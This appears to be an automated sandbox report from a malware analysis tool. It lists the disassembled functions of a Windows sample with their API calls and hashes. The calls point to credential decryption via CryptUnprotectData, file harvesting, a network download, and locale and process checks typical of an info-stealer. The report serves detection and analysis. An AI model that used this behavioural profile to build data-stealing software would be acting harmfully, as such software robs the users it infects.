Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 99d60315d6c630188ac22863b4c3b1ada234d6c1ce4d59ca324e7c8cad8dd6de
Instruction ID: 16b9519e73a2a048c1aa4c2f75882a05a68b4b793ed3d445f0fb30e7c05d6763
Opcode Fuzzy Hash: 99d60315d6c630188ac22863b4c3b1ada234d6c1ce4d59ca324e7c8cad8dd6de
Instruction Fuzzy Hash: 83123F71911118ABCB15FB61CC96EEE7338AF54314F4041AEB50B62091EF786BD8CF9A

Function 0040D8C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00421454,00420B96), ref: 0040D92B
StrCmpCA.SHLWAPI(?,00421458), ref: 0040D973
StrCmpCA.SHLWAPI(?,0042145C), ref: 0040D989
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040DC0C
FindClose.KERNEL32(000000FF), ref: 0040DC1E

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 1127765b5ef1ee2c2e4c3c09907bec98b00f1f6c3c7c44be527efefd783d98df
Instruction ID: be130f63dcff9d07870f4f5a4cae658f80ac6a3b159c82c28f33fed987b29411
Opcode Fuzzy Hash: 1127765b5ef1ee2c2e4c3c09907bec98b00f1f6c3c7c44be527efefd783d98df
Instruction Fuzzy Hash: 23914672900204A7CB14FBB1DC56DED737DAF94354F00866EF80A66191EE389B5C8B9B

Function 00405000 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
RtlAllocateHeap.NTDLL(00000000), ref: 00405021
InternetOpenA.WININET(00420DC7,00000000,00000000,00000000,00000000), ref: 0040503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
InternetReadFile.WININET(004159BB,?,00000400,00000000), ref: 00405091
memcpy.MSVCRT ref: 004050DA
InternetCloseHandle.WININET(004159BB), ref: 00405109
InternetCloseHandle.WININET(?), ref: 00405116

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: d639e477f116241a0e401493819a9aeee025cbe198c1119cc2fd44f54bc7604c
Instruction ID: 839bf57ea29f75d8981f3e40a03c3eb3ba9ac3aa2e1ac21d7b315b502f3c448d
Opcode Fuzzy Hash: d639e477f116241a0e401493819a9aeee025cbe198c1119cc2fd44f54bc7604c
Instruction Fuzzy Hash: 1D31E9B4A00618ABDB20CF54DD85BDDB7B5EF48304F5081E9BA09A7281C7746AC68F99

Function 0040E270 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420C1F), ref: 0040E2E2
StrCmpCA.SHLWAPI(?,0042149C), ref: 0040E332
StrCmpCA.SHLWAPI(?,004214A0), ref: 0040E348
FindNextFileA.KERNEL32(000000FF,?), ref: 0040EA1F

Strings

.@, xrefs: 0040EA35, 0040E42B, 0040E55C, 0040E69B, 0040E2F9, 0040E42E, 0040E55F, 0040E69E
\*.*, xrefs: 0040E28D

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: .@$\*.*
API String ID: 433455689-1178718010
Opcode ID: 721e50ffc95f48fc5f42698de39683495f379be7761399b9682ce927e7ed8c10
Instruction ID: 20f818950e8166c8af1a449285f1ab07a785d4baccce5c5ed3abadeee2d63442
Opcode Fuzzy Hash: 721e50ffc95f48fc5f42698de39683495f379be7761399b9682ce927e7ed8c10
Instruction Fuzzy Hash: BE125331911118ABCB14FB61DC5AEED7338AF54314F4045AEB90B62091EF786FD8CB9A

Function 00417630 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

GetKeyboardLayoutList.USER32(00000000,00000000,0042059F), ref: 00417681
LocalAlloc.KERNEL32(00000040,?), ref: 00417699
GetKeyboardLayoutList.USER32(?,00000000), ref: 004176AD
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417702
LocalFree.KERNEL32(00000000), ref: 004177C2

Strings

/ , xrefs: 0041771F

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 60f459b21bc8fd4d4d86911808f4b25552e0fe97f376acc6722a8a3d7c5d5934
Instruction ID: c1db32f68e501b8527b0747275b78d72b64e7f1ab46943026d097e8974929a8d
Opcode Fuzzy Hash: 60f459b21bc8fd4d4d86911808f4b25552e0fe97f376acc6722a8a3d7c5d5934
Instruction Fuzzy Hash: 49418F71941118ABCB24DF94DC89FEEB374FB54314F2041DAE40A62191DB782F85CFA5

Function 004190A0 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004190BE
Process32First.KERNEL32(00420AB3,00000128), ref: 004190D2
Process32Next.KERNEL32(00420AB3,00000128), ref: 004190E7
StrCmpCA.SHLWAPI(?,00000000), ref: 004190FC
CloseHandle.KERNEL32(00420AB3), ref: 0041911A

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
Instruction ID: 54ad55f7a4b81502d496241441e07260b80a378e6eebdd4a9cd1ea64267145a6
Opcode Fuzzy Hash: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
Instruction Fuzzy Hash: 1E010875A00208FBDB20DFA4CD99BEEBBF9AF08700F104199E909A7250DB749E85DF55

Function 00409BB0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BD4
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BF3
memcpy.MSVCRT ref: 00409C16
LocalFree.KERNEL32(?), ref: 00409C23

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
Instruction ID: 89a0ba0d6d0461e137ce63e6e87bc55d2f461512d11096c1476870e855060961
Opcode Fuzzy Hash: 7bf331572f1629f969e766ff9da9bf80e1d95d1acc3dba2254ec725ed3047747
Instruction Fuzzy Hash: 7111E8B8A00209DFCB04DF94D984AAEB7B6FF88300F108569E915A7390D730AE51CF65

Function 004174D0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02739F20,00000000,?,00420DE0,00000000,?,00000000,00000000), ref: 00417503
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02739F20,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041750A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02739F20,00000000,?,00420DE0,00000000,?,00000000,00000000,?), ref: 0041751D
wsprintfA.USER32 ref: 00417557

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
Instruction ID: e353cc71a305f1a8f1a8746e49c408d3a80ec80c51124973b3d8e1cf6413b4f4
Opcode Fuzzy Hash: ebf191636fdab90f45f19ccd6af6600c11bec1d160f4b14778d2533b0a03f9df
Instruction Fuzzy Hash: 4111E1B1E05618EBEB20CF54DC45FA9B779FB00720F10039AF50A932D0C7785A85CB55

Function 004172F0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
Instruction ID: d97db1a59c4db881a004fd13fa95f43a4b4e799dc382b7b3ddd968380e0460c3
Opcode Fuzzy Hash: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
Instruction Fuzzy Hash: B6F04FB1944648AFC710DF98DD45BAEBBB9FB08B21F10021AFA15A3690C7745545CBA1

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
Instruction ID: 6710e554edad90447a57410479f56be173a40300ace114c8cd68aa34356edfab
Opcode Fuzzy Hash: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
Instruction Fuzzy Hash: 17D05E74D0020CDBCB14DFE09A49ADDBB7AAB0D321F001656ED0572240DA305446CA65

Function 00407750 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00415CA4,?), ref: 00407764
RtlAllocateHeap.NTDLL(00000000,?,00415CA4,?), ref: 0040776B
lstrcat.KERNEL32(?,027100F0), ref: 0040791B
lstrcat.KERNEL32(?,?), ref: 0040792F
lstrcat.KERNEL32(?,?), ref: 00407943
lstrcat.KERNEL32(?,?), ref: 00407957
lstrcat.KERNEL32(?,027399F8), ref: 0040796B
lstrcat.KERNEL32(?,02739860), ref: 0040797F
lstrcat.KERNEL32(?,027399C8), ref: 00407992
lstrcat.KERNEL32(?,02739A58), ref: 004079A6
lstrcat.KERNEL32(?,02736598), ref: 004079BA
lstrcat.KERNEL32(?,?), ref: 004079CE
lstrcat.KERNEL32(?,?), ref: 004079E2
lstrcat.KERNEL32(?,?), ref: 004079F6
lstrcat.KERNEL32(?,027399F8), ref: 00407A09
lstrcat.KERNEL32(?,02739860), ref: 00407A1D
lstrcat.KERNEL32(?,027399C8), ref: 00407A31
lstrcat.KERNEL32(?,02739A58), ref: 00407A44
lstrcat.KERNEL32(?,02736600), ref: 00407A58
lstrcat.KERNEL32(?,?), ref: 00407A6C
lstrcat.KERNEL32(?,?), ref: 00407A80
lstrcat.KERNEL32(?,?), ref: 00407A94
lstrcat.KERNEL32(?,027399F8), ref: 00407AA8
lstrcat.KERNEL32(?,02739860), ref: 00407ABB
lstrcat.KERNEL32(?,027399C8), ref: 00407ACF
lstrcat.KERNEL32(?,02739A58), ref: 00407AE3
lstrcat.KERNEL32(?,027361F0), ref: 00407AF6
lstrcat.KERNEL32(?,?), ref: 00407B0A
lstrcat.KERNEL32(?,?), ref: 00407B1E
lstrcat.KERNEL32(?,?), ref: 00407B32
lstrcat.KERNEL32(?,027399F8), ref: 00407B46
lstrcat.KERNEL32(?,02739860), ref: 00407B5A
lstrcat.KERNEL32(?,027399C8), ref: 00407B6D
lstrcat.KERNEL32(?,02739A58), ref: 00407B81
lstrcat.KERNEL32(?,02736460), ref: 00407B95
lstrcat.KERNEL32(?,?), ref: 00407BA9
lstrcat.KERNEL32(?,?), ref: 00407BBD
lstrcat.KERNEL32(?,?), ref: 00407BD1
lstrcat.KERNEL32(?,027399F8), ref: 00407BE4
lstrcat.KERNEL32(?,02739860), ref: 00407BF8
lstrcat.KERNEL32(?,027399C8), ref: 00407C0C
lstrcat.KERNEL32(?,02739A58), ref: 00407C1F
lstrcat.KERNEL32(?,02735F80), ref: 00407C33
lstrcat.KERNEL32(?,?), ref: 00407C47
lstrcat.KERNEL32(?,?), ref: 00407C5B
lstrcat.KERNEL32(?,?), ref: 00407C6F
lstrcat.KERNEL32(?,027399F8), ref: 00407C83
lstrcat.KERNEL32(?,02739860), ref: 00407C96
lstrcat.KERNEL32(?,027399C8), ref: 00407CAA
lstrcat.KERNEL32(?,02739A58), ref: 00407CBE

Part of subcall function 00407610: lstrcat.KERNEL32(35442020,004217A0), ref: 00407646
Part of subcall function 00407610: lstrcat.KERNEL32(35442020,00000000), ref: 00407688
Part of subcall function 00407610: lstrcat.KERNEL32(35442020, : ), ref: 0040769A
Part of subcall function 00407610: lstrcat.KERNEL32(35442020,00000000), ref: 004076CF
Part of subcall function 00407610: lstrcat.KERNEL32(35442020,004217A8), ref: 004076E0
Part of subcall function 00407610: lstrcat.KERNEL32(35442020,00000000), ref: 00407713
Part of subcall function 00407610: lstrcat.KERNEL32(35442020,004217AC), ref: 0040772D
Part of subcall function 00407610: task.LIBCPMTD ref: 0040773B

lstrcat.KERNEL32(?,02736A08), ref: 00407E4B
lstrcat.KERNEL32(?,0273A5C0), ref: 00407E5E
